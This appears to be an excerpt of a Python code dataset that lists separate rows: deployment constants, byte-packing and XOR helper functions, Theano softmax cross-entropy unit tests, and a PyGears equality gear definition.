CHECKIN_MESSAGE_FUNCTIONAPP = 'Setting up Functionapp deployment workflow'
RELEASE_PLACEHOLDER = 'release_name_place_holder'
| StarcoderdataPython |
5181583 | # Copyright 2011 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python compatibility wrappers."""
from struct import pack
def byte(num: int) -> bytes:
"""
Converts a number between 0 and 255 (both inclusive) to a base-256 (byte)
representation.
:param num:
An unsigned integer between 0 and 255 (both inclusive).
:returns:
A single byte.
"""
return pack("B", num)
def xor_bytes(b1: bytes, b2: bytes) -> bytes:
"""
Returns the bitwise XOR result between two bytes objects, b1 ^ b2.
Bitwise XOR operation is commutative, so order of parameters doesn't
generate different results. If parameters have different length, extra
length of the largest one is ignored.
:param b1:
First bytes object.
:param b2:
Second bytes object.
:returns:
Bytes object, result of XOR operation.
"""
return bytes(x ^ y for x, y in zip(b1, b2))
| StarcoderdataPython |
9753655 | import numpy
from numpy.testing import assert_allclose
import theano
from theano import tensor
from theano import function
from blocks.bricks import Softmax
from blocks.bricks.cost import CategoricalCrossEntropy
def test_softmax_vector():
x = tensor.matrix('x')
y = tensor.lvector('y')
softmax_out = Softmax().apply(x)
cost = CategoricalCrossEntropy().apply(y, softmax_out)
cost_stable = Softmax().categorical_cross_entropy(y, x)
softmax_cost_func = function([x, y], cost)
softmax_cost_stable_func = function([x, y], cost_stable)
batch_size = 100
x_size = 10
x_val = numpy.asarray(numpy.random.randn(batch_size, x_size),
dtype=theano.config.floatX)
y_val = numpy.random.randint(low=0, high=x_size,
size=(batch_size)).astype(int)
softmax_cost = softmax_cost_func(x_val, y_val)
softmax_cost_stable = softmax_cost_stable_func(x_val, y_val)
assert_allclose(softmax_cost, softmax_cost_stable)
def test_softmax_matrix():
x = tensor.matrix('x')
y = tensor.matrix('y')
softmax_out = Softmax().apply(x)
cost = CategoricalCrossEntropy().apply(y, softmax_out)
cost_stable = Softmax().categorical_cross_entropy(y, x)
softmax_cost_func = function([x, y], cost)
softmax_cost_stable_func = function([x, y], cost_stable)
batch_size = 2
x_size = 2
x_val = numpy.asarray(numpy.random.randn(batch_size, x_size),
dtype=theano.config.floatX)
y_val_us = numpy.array(numpy.random.uniform(size=(batch_size, x_size)),
dtype=theano.config.floatX)
y_val = y_val_us / numpy.expand_dims(y_val_us.sum(axis=1),
axis=1)
softmax_cost = softmax_cost_func(x_val, y_val)
softmax_cost_stable = softmax_cost_stable_func(x_val, y_val)
assert_allclose(softmax_cost, softmax_cost_stable)
| StarcoderdataPython |
3450382 | from pygears.core.gear import alternative, gear
from pygears.typing import Uint
from pygears.util.hof import oper_tree
@gear(enablement=b'len(din) == 2')
def eq(*din,
din0_signed=b'typeof(din0, Int)',
din1_signed=b'typeof(din1, Int)') -> Uint[1]:
pass
@alternative(eq)
@gear
def eq_vararg(*din, enablement=b'len(din) > 2') -> Uint[1]:
return oper_tree(din, eq)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.